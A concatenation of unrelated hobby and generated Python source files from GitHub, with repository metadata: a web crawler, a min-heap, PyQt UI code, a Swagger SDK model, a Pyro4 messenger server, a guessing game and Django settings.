writer.add_scalar("losses/value_loss", v_loss.item(), global_step)
writer.add_scalar("losses/policy_loss", pg_loss.item(), global_step)
writer.add_scalar("losses/entropy", entropy.mean().item(), global_step)
writer.add_scalar("losses/approx_kl", approx_kl.item(), global_step)
if args.kle_stop or args.kle_rollback:
writer.add_scalar("debug/pg_stop_iter", i_epoch_pi, global_step)
envs.close()
writer.close()
|
[
"costa.huang@outlook.com"
] |
costa.huang@outlook.com
|
1af797637785baee1453b708d56a656cf2191fbe
|
49a66a4032a74360b9fc40ea7d86065528ff73f1
|
/crawler.py
|
b08ae3e65a9f3dc3b65a4f19187254d0466f6c41
|
[] |
no_license
|
Jivvon/cnu-computer-noti
|
73713a89026f92c678d85258d77760811ae61c54
|
2918a47d3d3edf900e510526a299dbb9ec510932
|
refs/heads/master
| 2021-03-07T22:58:13.078129
| 2020-11-18T14:31:28
| 2020-11-18T14:31:28
| 246,302,660
| 1
| 1
| null | 2020-07-28T08:02:59
| 2020-03-10T13:03:50
|
Python
|
UTF-8
|
Python
| false
| false
| 1,683
|
py
|
from bs4 import BeautifulSoup
import requests
class Crawler:
def __init__(self, url_data):
self.title, self.url = url_data['title'], url_data['url']
def _prettier_title(self, str):
content = str[:-6].strip()
if content[-1] == '-':
content = content[:-1].strip()
# content += '\n\n'
return content
def crawl_naw_notiwes_new_notices(self):
ret = []
err_msg = ''
try:
res = requests.get(self.url)
soup = BeautifulSoup(res.text, 'html.parser')
# new가 붙은 공지만 확인 (없을 수도 있다)
articles = soup.find_all("p", {"class": "b-new"})
for article in articles:
this_article = article.parent.parent
date = this_article.parent.parent.td.find_next("td").find_next("span", {
"class": "b-date"}).text.strip()
title = self._prettier_title(this_article.a['title'])
link = this_article.a['href']
ret.append({"date": date, "title": title, "link": link})
return ret
except requests.exceptions.HTTPError as errh:
err_msg = "Http Error: " + errh
print(err_msg)
except requests.exceptions.ConnectionError as errc:
err_msg = "Error Connecting: " + errc
print(err_msg)
except requests.exceptions.Timeout as errt:
err_msg = "Timeout Error: " + errt
print(err_msg)
except requests.exceptions.RequestException as err:
err_msg = "OOps: Something Else" + err
print(err_msg)
return err_msg
|
[
"poiu8944@gmail.com"
] |
poiu8944@gmail.com
|
fd5dc6448f59bcfc54d560de5f9992591b9359e1
|
e43b75b8420aee464960f6ddfb3412abba5b4c43
|
/pkg/heap.py
|
5260130c181e96e9766f3a6848c80b3a5036a84a
|
[] |
no_license
|
omar00070/Search-Algorithm-Vesualiser
|
44dab0985e393d3ba175dc1bcc04b79ed049d528
|
bac365484961a29b810b1f128a91725e7030b435
|
refs/heads/master
| 2021-05-23T10:54:59.154615
| 2020-04-16T12:44:04
| 2020-04-16T12:44:04
| 253,254,791
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,082
|
py
|
class MinHeap(object):
def __init__(self, items):
self.items = items
def get_left_child_index(self, parent_index):
return 2 * parent_index + 1
def get_right_child_index(self, parent_index):
return 2 * parent_index + 2
def get_parent_index(self, child_index):
return (child_index - 1)//2
def has_left_child(self, index):
return self.get_left_child_index(index) < len(self.items)
def has_right_child(self, index):
return self.get_right_child_index(index) < len(self.items)
def has_parent(self, index):
return self.get_parent_index(index) >= 0
def left_child(self, index):
return self.items[self.get_left_child_index(index)][1]
def right_child(self, index):
return self.items[self.get_right_child_index(index)][1]
def parent(self, index):
return self.items[self.get_parent_index(index)][1]
def peek(self):
if len(self.items) == 0:
print('no items in the list')
return
return self.items[0]
def poll(self):
if len(self.items) == 0:
print('no items in the list')
return
item = self.items[0]
self.items[0] = self.items[len(self.items) - 1]
self.items.pop(len(self.items) - 1)
self.heapify_down()
return item
def add(self, item):
self.items.append(item)
self.heapify_up()
def heapify_up(self):
index = len(self.items) - 1
while self.has_parent(index) and self.items[index][1] < self.parent(index):
self.swap(self.get_parent_index(index), index)
index = self.get_parent_index(index)
def heapify_down(self):
index = 0
while self.has_left_child(index):
min_child_index = self.get_left_child_index(index)
if self.has_right_child(index) and self.right_child(index) < self.left_child(index):
min_child_index = self.get_right_child_index(index)
if self.items[index][1] < self.items[min_child_index][1]:
break
else:
self.swap(index, min_child_index)
index = min_child_index
def swap(self, index, another_index):
swapper = self.items[index]
self.items[index] = self.items[another_index]
self.items[another_index] = swapper
def display(self):
return self.items
|
[
"omar_omarsalama@yahoo.com"
] |
omar_omarsalama@yahoo.com
|
7f25f98955abe392b7dda9c8795fbed133a1490e
|
d01af28d2edf3e61dbf24c73d752aebd89d3fa5c
|
/home/management/commands/load_initial_data.py
|
9f2a9023f9c62df73c459d302a05200693568061
|
[] |
no_license
|
crowdbotics-apps/django-new-backend-6-1127
|
9912710446cac1c24053caf9b291d094a438f7a3
|
7b884aa09aa326ebbeb12da20819093f966210d2
|
refs/heads/master
| 2022-03-15T05:32:29.638397
| 2019-11-25T19:34:16
| 2019-11-25T19:34:16
| 224,025,708
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 742
|
py
|
from django.core.management import BaseCommand
from home.models import CustomText, HomePage
def load_initial_data():
homepage_body = """
<h1 class="display-4 text-center">DJANGO-NEW-BACKEND-6</h1>
<p class="lead">
This is the sample application created and deployed from the crowdbotics slack app. You can
view list of packages selected for this application below
</p>"""
customtext_title = "DJANGO-NEW-BACKEND-6"
CustomText.objects.create(title=customtext_title)
HomePage.objects.create(body=homepage_body)
class Command(BaseCommand):
can_import_settings = True
help = "Load initial data to db"
def handle(self, *args, **options):
load_initial_data()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
f435292353b2c4e8fbb83a238cc608394eea5ab2
|
4f6b50edc726c3ae8e0fea9bbd2bd960d9b12071
|
/buycoffee.py
|
91b7cfc1cb7287542ff674f7891db9d98fa3a59a
|
[] |
no_license
|
rumeysayilmaz/misc-python
|
1fa51d7b4007ad991cbb820a431b11ca12b4f409
|
47875031b3ebd65072e69622c010c33fa7949c23
|
refs/heads/master
| 2023-08-15T06:21:47.905659
| 2021-10-05T11:06:51
| 2021-10-05T11:06:51
| 225,593,941
| 0
| 0
| null | 2021-04-26T12:47:49
| 2019-12-03T10:35:14
| null |
UTF-8
|
Python
| false
| false
| 4,810
|
py
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'buycoffee.ui'
#
# Created by: PyQt5 UI code generator 5.15.4
#
# WARNING: Any manual changes made to this file will be lost when pyuic5 is
# run again. Do not edit this file unless you know what you are doing.
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_MainWindow(object):
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(203, 221)
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout_3 = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout_3.setObjectName("gridLayout_3")
self.frame = QtWidgets.QFrame(self.centralwidget)
self.frame.setFrameShape(QtWidgets.QFrame.StyledPanel)
self.frame.setFrameShadow(QtWidgets.QFrame.Raised)
self.frame.setObjectName("frame")
self.gridLayout_2 = QtWidgets.QGridLayout(self.frame)
self.gridLayout_2.setObjectName("gridLayout_2")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_2.addItem(spacerItem, 1, 0, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout_2.addItem(spacerItem1, 1, 2, 1, 1)
spacerItem2 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_2.addItem(spacerItem2, 2, 1, 1, 1)
self.groupBox = QtWidgets.QGroupBox(self.frame)
self.groupBox.setObjectName("groupBox")
self.gridLayout = QtWidgets.QGridLayout(self.groupBox)
self.gridLayout.setObjectName("gridLayout")
self.coffee_pushButton = QtWidgets.QPushButton(self.groupBox)
font = QtGui.QFont()
font.setPointSize(12)
self.coffee_pushButton.setFont(font)
self.coffee_pushButton.setText("")
self.coffee_pushButton.setObjectName("coffee_pushButton")
self.gridLayout.addWidget(self.coffee_pushButton, 0, 0, 1, 1)
self.multiply_label = QtWidgets.QLabel(self.groupBox)
font = QtGui.QFont()
font.setPointSize(12)
self.multiply_label.setFont(font)
self.multiply_label.setObjectName("multiply_label")
self.gridLayout.addWidget(self.multiply_label, 0, 1, 1, 1)
self.cup_lineEdit = QtWidgets.QLineEdit(self.groupBox)
font = QtGui.QFont()
font.setPointSize(12)
self.cup_lineEdit.setFont(font)
self.cup_lineEdit.setText("")
self.cup_lineEdit.setObjectName("cup_lineEdit")
self.gridLayout.addWidget(self.cup_lineEdit, 0, 2, 1, 1)
self.support_pushButton = QtWidgets.QPushButton(self.groupBox)
font = QtGui.QFont()
font.setPointSize(12)
self.support_pushButton.setFont(font)
self.support_pushButton.setText("")
self.support_pushButton.setObjectName("support_pushButton")
self.gridLayout.addWidget(self.support_pushButton, 1, 0, 1, 3)
self.gridLayout_2.addWidget(self.groupBox, 1, 1, 1, 1)
spacerItem3 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_2.addItem(spacerItem3, 0, 1, 1, 1)
self.gridLayout_3.addWidget(self.frame, 0, 0, 1, 1)
self.bottominfo_label = QtWidgets.QLabel(self.centralwidget)
self.bottominfo_label.setText("")
self.bottominfo_label.setObjectName("bottominfo_label")
self.gridLayout_3.addWidget(self.bottominfo_label, 1, 0, 1, 1)
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 203, 22))
self.menubar.setObjectName("menubar")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
def retranslateUi(self, MainWindow):
_translate = QtCore.QCoreApplication.translate
MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow"))
self.groupBox.setTitle(_translate("MainWindow", "Buy us a Coffee"))
self.multiply_label.setText(_translate("MainWindow", "x"))
self.cup_lineEdit.setPlaceholderText(_translate("MainWindow", "1"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
MainWindow = QtWidgets.QMainWindow()
ui = Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_())
|
[
"era.ylmaz@gmail.com"
] |
era.ylmaz@gmail.com
|
6caf293016e15a9355c2daf611612291c1fe1e16
|
e519a3134e5242eff29a95a05b02f8ae0bfde232
|
/services/control-tower/vendor/riffyn-sdk/swagger_client/models/update_activity_body.py
|
6c2506664c5cc08aa10e67f70e81da898030ac23
|
[] |
no_license
|
zoltuz/lab-automation-playground
|
ba7bc08f5d4687a6daa64de04c6d9b36ee71bd3e
|
7a21f59b30af6922470ee2b20651918605914cfe
|
refs/heads/master
| 2023-01-28T10:21:51.427650
| 2020-12-04T14:13:13
| 2020-12-05T03:27:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,857
|
py
|
# coding: utf-8
"""
Riffyn REST API
### Vocabulary Before you begin, please familiarize yourself with our [Glossary of Terms](https://help.riffyn.com/hc/en-us/articles/360045503694). ### Getting Started If you'd like to play around with the API, there are several free GUI tools that will allow you to send requests and receive responses. We suggest using the free app [Postman](https://www.getpostman.com/). ### Authentication Begin with a call the [authenticate](/#api-Authentication-authenticate) endpoint using [HTTP Basic authentication](https://en.wikipedia.org/wiki/Basic_access_authentication) with your `username` and `password` to retrieve either an API Key or an Access Token. For example: curl -X POST -u '<username>' https://api.app.riffyn.com/v1/auth -v You may then use either the API Key or the accessToken for all future requests to the API. For example: curl -H 'access-token: <ACCESS_TOKEN>' https://api.app.riffyn.com/v1/units -v curl -H 'api-key: <API_KEY>' https://api.app.riffyn.com/v1/units -v The tokens' values will be either in the message returned by the `/authenticate` endpoint or in the createApiKey `/auth/api-key` or CreateAccesToken `/auth/access-token` endpoints. The API Key will remain valid until it is deauthorized by revoking it through the Security Settings in the Riffyn App UI. The API Key is best for running scripts and longer lasting interactions with the API. The Access Token will expire automatically and is best suited to granting applications short term access to the Riffyn API. Make your requests by sending the HTTP header `api-key: $API_KEY`, or `access-token: $ACCESS_TOKEN`. In Postman, add your prefered token to the headers under the Headers tab for any request other than the original request to `/authenticate`. If you are enrolled in MultiFactor Authentication (MFA) the `status` returned by the `/authenticate` endpoint will be `MFA_REQUIRED`. A `passCode`, a `stateToken`, and a `factorId` must be passed to the [/verify](/#api-Authentication-verify) endpoint to complete the authentication process and achieve the `SUCCESS` status. MFA must be managed in the Riffyn App UI. ### Paging and Sorting The majority of endpoints that return a list of data support paging and sorting through the use of three properties, `limit`, `offset`, and `sort`. Please see the list of query parameters, displayed below each endpoint's code examples, to see if paging or sorting is supported for that specific endpoint. Certain endpoints return data that's added frequently, like resources. As a result, you may want filter results on either the maximum or minimum creation timestamp. This will prevent rows from shifting their position from the top of the list, as you scroll though subsequent pages of a multi-page response. Before querying for the first page, store the current date-time (in memory, a database, a file...). On subsequent pages you *may* include the `before` query parameter, to limit the results to records created before that date-time. E.g. before loading page one, you store the current date time of `2016-10-31T22:00:00Z` (ISO date format). Later, when generating the URL for page two, you *could* limit the results by including the query parameter `before=1477951200000` (epoch timestamp). ### Postman endpoint examples There is a YAML file with the examples of the request on Riffyn API [Click here](/collection) to get the file. If you don't know how to import the collection file, [here](https://learning.postman.com/docs/postman/collections/data-formats/#importing-postman-data) are the steps. ### Client SDKs You may write your own API client, or you may use one of ours. [Click here](/clients) to select your programming language and download an API client. # noqa: E501
OpenAPI spec version: 1.4.0
Contact: support@riffyn.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class UpdateActivityBody(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'description': 'str',
'db_query': 'bool',
'file_upload': 'bool'
}
attribute_map = {
'name': 'name',
'description': 'description',
'db_query': 'dbQuery',
'file_upload': 'fileUpload'
}
def __init__(self, name=None, description=None, db_query=None, file_upload=None): # noqa: E501
"""UpdateActivityBody - a model defined in Swagger""" # noqa: E501
self._name = None
self._description = None
self._db_query = None
self._file_upload = None
self.discriminator = None
if name is not None:
self.name = name
if description is not None:
self.description = description
if db_query is not None:
self.db_query = db_query
if file_upload is not None:
self.file_upload = file_upload
@property
def name(self):
"""Gets the name of this UpdateActivityBody. # noqa: E501
The new name for the activity being updated. If no name is provided, it will default to 'unnamed'. # noqa: E501
:return: The name of this UpdateActivityBody. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this UpdateActivityBody.
The new name for the activity being updated. If no name is provided, it will default to 'unnamed'. # noqa: E501
:param name: The name of this UpdateActivityBody. # noqa: E501
:type: str
"""
self._name = name
@property
def description(self):
"""Gets the description of this UpdateActivityBody. # noqa: E501
A description of the step that will appear in the side panel of the application. # noqa: E501
:return: The description of this UpdateActivityBody. # noqa: E501
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this UpdateActivityBody.
A description of the step that will appear in the side panel of the application. # noqa: E501
:param description: The description of this UpdateActivityBody. # noqa: E501
:type: str
"""
self._description = description
@property
def db_query(self):
"""Gets the db_query of this UpdateActivityBody. # noqa: E501
Defines whether pulling data from a database query will be required on the experiments made from this process. # noqa: E501
:return: The db_query of this UpdateActivityBody. # noqa: E501
:rtype: bool
"""
return self._db_query
@db_query.setter
def db_query(self, db_query):
"""Sets the db_query of this UpdateActivityBody.
Defines whether pulling data from a database query will be required on the experiments made from this process. # noqa: E501
:param db_query: The db_query of this UpdateActivityBody. # noqa: E501
:type: bool
"""
self._db_query = db_query
@property
def file_upload(self):
"""Gets the file_upload of this UpdateActivityBody. # noqa: E501
Defines whether pulling data via a file upload will be required on the experiments made from this process. # noqa: E501
:return: The file_upload of this UpdateActivityBody. # noqa: E501
:rtype: bool
"""
return self._file_upload
@file_upload.setter
def file_upload(self, file_upload):
"""Sets the file_upload of this UpdateActivityBody.
Defines whether pulling data via a file upload will be required on the experiments made from this process. # noqa: E501
:param file_upload: The file_upload of this UpdateActivityBody. # noqa: E501
:type: bool
"""
self._file_upload = file_upload
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(UpdateActivityBody, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdateActivityBody):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
[
"jaceys.tan@gmail.com"
] |
jaceys.tan@gmail.com
|
c2725c51490a01461ad12e6f63e3cd859f2a3494
|
bb085bb384e847329d6816027aca703ce2a08c11
|
/PythonExercicio/ex097.py
|
8cce5b2cfb554a76997fe86ef3e8c7e38b23d3f9
|
[
"MIT"
] |
permissive
|
VazMF/cev-python
|
cd3174e5ea1b3574d0dff4f5ca367d2f695af789
|
9b33f0bc3de5dd9380fdd4eb3d901b04e536d45a
|
refs/heads/master
| 2023-02-27T23:25:15.049300
| 2021-02-02T11:47:33
| 2021-02-02T11:47:33
| 262,906,059
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 691
|
py
|
#Faça um programa que tenha uma função chamada escreva(), que receba um texto qualquer como parâmetro e mostre uma msg com tamanho adaptavel
#DEFININDO A FUNÇÃO
def escreva(txt): #função com parametro para texto
tam = len(txt) + 4 #variavel tamanho recebe o tamanho do txt + 4
print('~' * tam) #print um ~ para cada caractere do texto
print(f' {txt}') #print formatado do texto com espaços para centralizar
print('~' * tam) #print um ~ para cada caractere do texto
#programa principal
escreva('Fuck this love calling my name, get out of my veins') #usando a função escreva
escreva('No reasons to stay, is a good reason to go')
escreva('No crying in the club')
|
[
"vazfernandam@gmail.com"
] |
vazfernandam@gmail.com
|
3974e7f5c8ad03000cf7d466e97d7638c8111a37
|
5063faf298a36466cdb90f1cbd0a4f4e855b5d3b
|
/test/test_task_path_reference.py
|
e8b6750bf47e6f452dd8b246ef0d5f54043ce65d
|
[] |
no_license
|
pollination/python-sdk
|
d4eb4efbcbe3a76cc170cf8e71ad5bc6ca6c3011
|
e4a94b236534658b150961795256224fe8dd93c2
|
refs/heads/master
| 2023-08-04T15:19:29.126613
| 2022-03-06T10:43:21
| 2022-03-06T10:51:08
| 224,588,062
| 3
| 1
| null | 2023-09-05T20:52:35
| 2019-11-28T06:48:40
|
Python
|
UTF-8
|
Python
| false
| false
| 1,648
|
py
|
# coding: utf-8
"""
pollination-server
Pollination Server OpenAPI Definition # noqa: E501
The version of the OpenAPI document: 0.27.0
Contact: info@pollination.cloud
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import pollination_sdk
from pollination_sdk.models.task_path_reference import TaskPathReference # noqa: E501
from pollination_sdk.rest import ApiException
class TestTaskPathReference(unittest.TestCase):
"""TaskPathReference unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def make_instance(self, include_optional):
"""Test TaskPathReference
include_option is a boolean, when False only required
params are included, when True both required and
optional params are included """
# model = pollination_sdk.models.task_path_reference.TaskPathReference() # noqa: E501
if include_optional :
return TaskPathReference(
annotations = {
'key' : '0'
},
name = '0',
type = 'TaskPathReference',
variable = '0'
)
else :
return TaskPathReference(
name = '0',
variable = '0',
)
def testTaskPathReference(self):
"""Test TaskPathReference"""
inst_req_only = self.make_instance(include_optional=False)
inst_req_and_optional = self.make_instance(include_optional=True)
if __name__ == '__main__':
unittest.main()
|
[
"antoinedao1@gmail.com"
] |
antoinedao1@gmail.com
|
46ec4a8216c97b11238b5fbe9a213803b9958c31
|
9997b17e63f7f41dd9c71122c5dcc39a25d1634b
|
/server/server.py
|
2064999b8475e6707ed1475ff052015e49e49552
|
[] |
no_license
|
Darge/Messenger
|
0cc4fdb753d1e3780418326d043b45e858ba635b
|
84915eda13c245bb73b4c180aff62022d9f1d18a
|
refs/heads/master
| 2021-01-25T12:01:53.559902
| 2015-09-04T05:37:29
| 2015-09-04T05:37:29
| 32,997,574
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,724
|
py
|
'''
Tomasz Flendrich
nr indeksu 264596
'''
import sqlite3
import thread
from datetime import datetime
import Pyro4
import sys
import os
'''
This module is the server of the Messenger. It handles contacting with the clients.
'''
class Server(object):
def log_in(self, nick, password):
'''When a client sends us a log in request'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db") # thread-safe as long as every thread has a different cursor (and they do)
cursor=database.cursor()
cursor.execute("SELECT Rowid, Nick, Password FROM Users WHERE Nick LIKE ?", (nick,))
existing=cursor.fetchone()
if existing==None:
cursor.execute("INSERT INTO Users VALUES (?, ?)", (nick, password))
database.commit()
cursor.close()
return "account created"
else:
if existing[1]==nick and existing[2]==password:
cursor.close()
return "correct password"
else:
cursor.close()
return "wrong password"
def new_messages_info_request(self, nick):
'''When a client wants to know from whom he has pending messages.
Keep in mind that it doesn't check the password.'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("SELECT DISTINCT Sender FROM Messages WHERE Receiver LIKE ?", (nick,))
result=cursor.fetchall()
cursor.close()
return result
def send_data(self, nick, password, senders):
'''Sends the messages coming from senders (a tuple) to a specific contact'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("SELECT Rowid, Nick, Password FROM Users WHERE Nick LIKE ?", (nick,))
existing=cursor.fetchone()
if existing==None or existing[2]!=password:
cursor.close()
return None # the password is wrong
results=[]
for sender in senders:
cursor.execute("SELECT Sender, Date2, Message FROM Messages WHERE Receiver LIKE ? AND Sender Like ?", (nick, sender))
result=cursor.fetchall()
results.append(result)
cursor.execute("DELETE FROM Messages WHERE Receiver LIKE ? and Sender LIKE ?", (nick, sender))
database.commit()
cursor.close()
return results
def new_data(self, sender, receiver, password, message):
'''Receives a message from the sender to its receiver'''
date=datetime.now()
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("SELECT Rowid, Nick, Password FROM Users WHERE Nick LIKE ?", (sender,))
existing=cursor.fetchone()
if existing!=None:
if existing[1]==sender and existing[2]==password:
pass
else:
cursor.close()
return "wrong username or password"
else:
cursor.close()
return "wrong username or password"
cursor.execute("INSERT INTO Messages VALUES (?, ?, ?, ?)", (sender, receiver, date, message))
database.commit()
cursor.close()
return
def add_contact(self, nick, contact_nick):
'''Adds a contact to one's contact list'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("INSERT OR IGNORE INTO Contacts(Nick, Contact) VALUES (?, ?)", (nick, contact_nick)) # Inserts without repetitions
database.commit()
cursor.close()
def delete_contact(self, nick, contact_nick):
'''Deletes a contact from one's contact list'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("DELETE FROM Contacts WHERE Nick LIKE ? AND Contact LIKE ?", (nick, contact_nick))
database.commit()
cursor.close()
def give_contacts(self, nick):
'''Returns the contacts of a certain nick'''
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
cursor.execute("SELECT Contact FROM Contacts WHERE Nick LIKE ?", (nick,))
results=cursor.fetchall()
cursor.close()
return results
database=sqlite3.connect(os.path.dirname(os.path.realpath(__file__))+"\database.db")
cursor=database.cursor()
try:
cursor.execute("CREATE TABLE Users (Nick text, Password text)")
cursor.execute("CREATE TABLE Messages (Sender text, Receiver text, Date2 text, Message text)")
cursor.execute("CREATE TABLE Contacts (Nick text, Contact text, UNIQUE(Nick, Contact))")
database.commit()
except sqlite3.OperationalError:
pass
cursor.close()
Pyro4.config.HOST
server=Server()
daemon=Pyro4.Daemon()
ns=Pyro4.locateNS()
uri=daemon.register(server)
ns.register("server", uri)
daemon.requestLoop()
|
[
"Darge@users.noreply.github.com"
] |
Darge@users.noreply.github.com
|
9ad135ccde28a412a93e355dd5a5c0dd4cff0f65
|
4314fabe3a4ad80af97066df65340eadc93450c8
|
/The_Perfect_Guess_Game.py
|
795538d562d4128fe00b978ed97da8bc5cbd410e
|
[] |
no_license
|
vishal-project/Python-Projects
|
7bffcd8513c43340c75deb4df415ff4d9cebd8a7
|
0a380e1a344d56cdbe0c05b4a701afce2f8946d6
|
refs/heads/master
| 2023-04-24T02:36:37.147505
| 2021-03-28T18:29:55
| 2021-03-28T18:29:55
| 348,380,379
| 0
| 0
| null | 2021-05-09T14:11:52
| 2021-03-16T14:33:52
|
Python
|
UTF-8
|
Python
| false
| false
| 874
|
py
|
# *********************PROJECT-4 THE PERFECT GUESS************************
# To guess a no. from 1 to 100.
import random
randomNumber = random.randint(1, 100)
print(randomNumber)
userGuess = 0
guessNo = 0
while userGuess != randomNumber:
userGuess = int(input("Enter your Guess from 1 to 100.\n"))
guessNo += 1
if(userGuess==randomNumber):
print(f"You guessed it right in {guessNo} attempts !")
elif userGuess > randomNumber:
print("You gussed it wrong !")
print("Lower No. Plz !")
elif userGuess < randomNumber:
print("You gussed it wrong !")
print("Higher No. Plz !")
with open("hiscore.txt","r") as f:
hiscore= int(f.read())
if guessNo<hiscore:
print("You have just broken the previous record !!!")
with open("hiscore.txt","w") as f:
f.write(str(guessNo))
|
[
"vishal.maurya18995@gmail.com"
] |
vishal.maurya18995@gmail.com
|
947e91a3cfd114e1cb0191e08cdb24dcbe9b8292
|
00f994bb874724a8a22ec69e7d65d26f87c9af24
|
/Snippets/settings.py
|
9e8bfe5394b6c20cdb3cc48cf0e547d15946f3b5
|
[] |
no_license
|
Lubl-42/baruibino
|
5df5219db4795ef9bc9eecd86996d4473bdf8262
|
3e08e2352301c6f944b1f5b9bbb4161c9c0b8926
|
refs/heads/main
| 2023-05-05T02:11:29.207839
| 2021-06-03T11:38:36
| 2021-06-03T11:38:36
| 370,471,602
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,208
|
py
|
"""
Django settings for Snippets project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
import os
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
STATICFILES_DIRS=[ BASE_DIR/'static' ]
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '#%3rmpy6hb52y7j^tu7g*v$762rc0&f+26yy3x!j&+@s4(ndq@'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'MainApp',
'django_extensions'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'Snippets.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'Snippets.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
